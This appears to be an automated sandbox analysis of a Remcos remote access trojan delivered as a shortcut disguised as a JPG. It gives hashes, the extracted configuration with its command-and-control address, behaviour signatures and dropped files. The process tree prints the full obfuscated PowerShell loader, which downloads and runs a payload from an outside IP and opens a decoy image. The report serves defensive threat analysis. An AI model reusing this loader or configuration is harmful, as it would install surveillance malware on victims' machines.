Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
-
submitted
27-07-2024 02:06
General
-
Target
telegrama_ksv_po_btgr.jpg.lnk
-
Size
691KB
-
MD5
1b61b585894e7f10e0832267aece4ae5
-
SHA1
dfe46a56fa632dca431378783294d0d628dbbf11
-
SHA256
7fc0ad878bbb15947115a6726c873bf8f682f7ef9e4ad8eed87718e710462d68
-
SHA512
2b1c2503bea85fb3506ee8873c738fc94ef6eb30b61267db648438bfc807aad89695898c98911f8c5f1728d4b807d0cdbd425dcefff1ad004de7a5e8590516a4
-
SSDEEP
24:87+L4zxKx2cWwlAFWY+/CWd3LUJ9PRZXhuaEkDllXQdxb0NFxCcK4hyJllQQK7Oj:8C8xwOu3m9PRZRuaqoxCcKXP9Ousbsg
Malware Config
Extracted
remcos
huma
81.19.139.74:4343
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-OMQQOG
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 16 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\telegrama_ksv_po_btgr.jpg.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo HpyFoGlBKeYQeWSdyufGOCGdzIwmgYgsnYKcjkFaHUpAXzbPAwbVNhh; echo miwjXBEddaBHwmYbdNByEwiJKM; echo LqOznMlUCsDTxYSjIUhsBBTbVfxuWySxodlFxGwFa; if (-not(Test-Path 'pgg.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''8''1.''19''.13''9.7''4/fhtp934657hgjdkldjnblcvpgg.zip -OutFile pgg.zip}; echo xmuPVGdLRDEbkgTMJhpjqkgYErlsLMPnFgQbzNlPBRRvAEgNcREUTcP; Expand-Archive -Path pgg.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/ScreenShot.exe; echo NHidrCPnjoegRZwYCYRruMbryNSdABbWytTvifRUxWfODYUOZl; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''8''1.''19''.13''9.7''4/fhtp934657hgjdkldjnblcvracs/telegrama_ksv_po_btgr.jpg -OutFile telegrama_ksv_po_btgr.jpg; echo AyVgofGfoNdAnBCLApPXNBssQazwQ; s''t''a''rt telegrama_ksv_po_btgr.jpg2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\bj_service_testv4\ScreenShot.exeC:\Users\Admin\AppData\Roaming\bj_service_testv4\ScreenShot.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2bdca35fFilesize
1.2MB
MD5a791559031feaa2540ae2c34a20aeefd
SHA1861934613cf5410b90db2bd7cd0508fb88cb9c05
SHA256dd1fa17a439c39f470efcaa9f93d8fdf0da11b8b3dfb4e0585b1ddcc11a3bbe9
SHA512a18a01d73d5574179579a5e41ae4bc2818dc3b3d04449f261a37437a2ae8caebc4e5b311bbb66010df0c48c4f8e567ed320624d38516e378fb6c5ce6c38738f6
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1aksexh.rkw.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exeFilesize
1.3MB
MD56a2cdd8709524999190f4b43a83108c9
SHA147b472ca518760552d1e0fa2d2321339dd596471
SHA256bd0f954149173d3f5766eee5bd78d5f27ea1ea69667da7b3970b0e6154afc85f
SHA5123b9a50892b7b18480380f69f0eb185b663e82da16064b60a262e9f3181f23ee8510b338eb28af7b961ab555082ffc494cc4fa950610d1991e6d1fa12ba497299
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\altorilievo.pptFilesize
942KB
MD5e540c4fcecd77b819094eee15ced316a
SHA1d45eb272fdf83641c942c0b7c66aa1ae313738a0
SHA256577ddb0c94d3814a044af5a4ff2591f1e59d227ae00b37358427e2de2d80ff3d
SHA51201ae43e96ae17b121f2c44b2c67f8ef66e7e278331d4c27d98206304b3a25d3dc211c3a1e2e2c6de6c342007cb67dcfbd7b6af7eeec5c5af5ad8421472d09c8e
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\centenary.appFilesize
29KB
MD5ed5672e9357974fe27faa05c97b9c6ce
SHA1f866486cd73b42d4aedddba71f16cad9d4554fcb
SHA256530f8dbee1036b66a3c77512e216ab0f67779a3640daf2864d1fd8bd7e539c30
SHA512246b0e833f6b081d9a839537039c1b3432501c2d42491cd5feb45e1a82c71e55370532d8854700eea3a335728cb5c4a7a396e6896ff896427a8f95befdf68252
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\madbasic_.bplFilesize
212KB
MD5a734f2428443030c46db9ce3ab2e68a6
SHA11bf4d3e9b4bf1d801a348f2e46cc9887bae12998
SHA256038511fc64801be03d8472a2f7a6ba8a27e0398cf876be1427c1463cf9190c80
SHA512d829ea13a0d736bee3a788822f5c04e58deff6175da735c25b8031d19e9c3c6bfa40af6882b6e842ba466ba0a5d51c766310491d73261a842334215edf09b699
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\maddisAsm_.bplFilesize
64KB
MD511efab4068cb4058207959e2638c2c1a
SHA1b1eac0879dcda14bdc0c2efd7f261d7c175208c3
SHA25611e3568f497c40331ee4a9e9973967e61b224e19204e09ed7451da3b74bd2ff5
SHA512ced6167612674232429c25e52ba051994b09fdaeaf3316505904456ef8d7063f2eb03b5a158f0a424f0ecb49673e6a3d6b57d61183c5f8402da3fe53af0bd185
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\madexcept_.bplFilesize
438KB
MD5562ec96d0f65b0309ad7508d0e0ced11
SHA10fe9dda664f4f8d9ae18603c5a25756710032a6f
SHA256fb64a5954b726d2d0f0bc26113a36dc8a86c469af994ceeaf2e2609743a0a557
SHA512876b82534764b2d156ce64d52771d38f245d330957287773f6b2360f48564b8d4a304449fa6f6400052165aaf433a191af2d3b38b194a9b1e892552dc0805fba
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\rtl120.bplFilesize
1.1MB
MD5e71e48e31ac728a6de7c020645f0c32f
SHA17f86eadd1b7a0ab87b7ce7c2029bdef3d6fe1d8d
SHA25640a1d1a2f276738f568700ddccac99cdcd35b973fc8be86ab826c0d1abc9d6ff
SHA5125e41dbe7efac8a042a14c2f976d1afcd45e3f7531fb60daab61ac17ffd339d34e1c6746fce9e4b591b026598a89e38f36c6d24e33e2de0b39d81806259f9be2a
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\vcl120.bplFilesize
1.9MB
MD5c8cff500ac30e5ef120ecb00bcdc0ebb
SHA16dc63844fbc7e9678d8653d715d1f65c8c9f834b
SHA2567867aa9cb994e770c40e5b827d4f689bdc913b3466965b77a2b322d6c526045b
SHA512de393681162c50507f3a54b957c264a25993e28b38ac7f21df9b2ce2eab9177a46e1336a88a5045c75aa66f5e9cf2b5edeef5516225bdd80ed0c01506489e8b0
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\vclx120.bplFilesize
223KB
MD58aaa3926885b3fa7ae0448f5e700cb79
SHA147bd7d281ddde5ebef8599482212743bf2f7e67b
SHA25647396c301fbe78bfaf9e344936a0f7a4e6d174c096f847e160d822e48012162d
SHA51286d395ca89ec2a988f035ecb32640ddac99247e2568673246388fe310e8c3a44807049e8f3482fae86c453d5e3529a8f2daf8614a1086b6d979e64fd917bbe3a
-
memory/2340-83-0x0000000059800000-0x000000005986E000-memory.dmpFilesize
440KB
-
memory/2340-84-0x0000000057800000-0x0000000057812000-memory.dmpFilesize
72KB
-
memory/2340-80-0x0000000057000000-0x000000005703F000-memory.dmpFilesize
252KB
-
memory/2340-66-0x0000000074F80000-0x00000000750FB000-memory.dmpFilesize
1.5MB
-
memory/2340-67-0x00007FFD66510000-0x00007FFD66705000-memory.dmpFilesize
2.0MB
-
memory/2340-79-0x0000000000400000-0x000000000058B000-memory.dmpFilesize
1.5MB
-
memory/2340-85-0x0000000050310000-0x0000000050349000-memory.dmpFilesize
228KB
-
memory/2340-81-0x0000000050000000-0x0000000050116000-memory.dmpFilesize
1.1MB
-
memory/2340-82-0x0000000050120000-0x000000005030D000-memory.dmpFilesize
1.9MB
-
memory/2812-122-0x0000000074F80000-0x00000000750FB000-memory.dmpFilesize
1.5MB
-
memory/2812-120-0x00007FFD66510000-0x00007FFD66705000-memory.dmpFilesize
2.0MB
-
memory/2976-114-0x0000000057000000-0x000000005703F000-memory.dmpFilesize
252KB
-
memory/2976-110-0x0000000074F80000-0x00000000750FB000-memory.dmpFilesize
1.5MB
-
memory/2976-113-0x0000000050000000-0x0000000050116000-memory.dmpFilesize
1.1MB
-
memory/2976-104-0x0000000074F80000-0x00000000750FB000-memory.dmpFilesize
1.5MB
-
memory/2976-117-0x0000000050120000-0x000000005030D000-memory.dmpFilesize
1.9MB
-
memory/2976-118-0x0000000050310000-0x0000000050349000-memory.dmpFilesize
228KB
-
memory/2976-105-0x00007FFD66510000-0x00007FFD66705000-memory.dmpFilesize
2.0MB
-
memory/2976-112-0x0000000000400000-0x000000000058B000-memory.dmpFilesize
1.5MB
-
memory/2976-115-0x0000000059800000-0x000000005986E000-memory.dmpFilesize
440KB
-
memory/3536-2-0x00007FFD48023000-0x00007FFD48025000-memory.dmpFilesize
8KB
-
memory/3536-14-0x00007FFD48020000-0x00007FFD48AE1000-memory.dmpFilesize
10.8MB
-
memory/3536-21-0x00000262D5A10000-0x00000262D5A1A000-memory.dmpFilesize
40KB
-
memory/3536-20-0x00000262D7F70000-0x00000262D7F82000-memory.dmpFilesize
72KB
-
memory/3536-19-0x00007FFD48020000-0x00007FFD48AE1000-memory.dmpFilesize
10.8MB
-
memory/3536-17-0x00007FFD48020000-0x00007FFD48AE1000-memory.dmpFilesize
10.8MB
-
memory/3536-13-0x00007FFD48020000-0x00007FFD48AE1000-memory.dmpFilesize
10.8MB
-
memory/3536-12-0x00000262D5B20000-0x00000262D5B42000-memory.dmpFilesize
136KB
-
memory/3536-16-0x00007FFD48020000-0x00007FFD48AE1000-memory.dmpFilesize
10.8MB
-
memory/3536-109-0x00007FFD48020000-0x00007FFD48AE1000-memory.dmpFilesize
10.8MB
-
memory/3536-15-0x00007FFD48023000-0x00007FFD48025000-memory.dmpFilesize
8KB
-
memory/4512-124-0x00007FFD66510000-0x00007FFD66705000-memory.dmpFilesize
2.0MB
-
memory/4512-125-0x0000000000970000-0x00000000009F4000-memory.dmpFilesize
528KB
-
memory/4512-129-0x0000000000970000-0x00000000009F4000-memory.dmpFilesize
528KB
-
memory/4512-130-0x0000000000970000-0x00000000009F4000-memory.dmpFilesize
528KB
-
memory/4512-131-0x0000000000970000-0x00000000009F4000-memory.dmpFilesize
528KB
-
memory/4512-132-0x0000000000970000-0x00000000009F4000-memory.dmpFilesize
528KB
-
memory/4512-133-0x0000000000970000-0x00000000009F4000-memory.dmpFilesize
528KB
-
memory/4512-134-0x0000000000970000-0x00000000009F4000-memory.dmpFilesize
528KB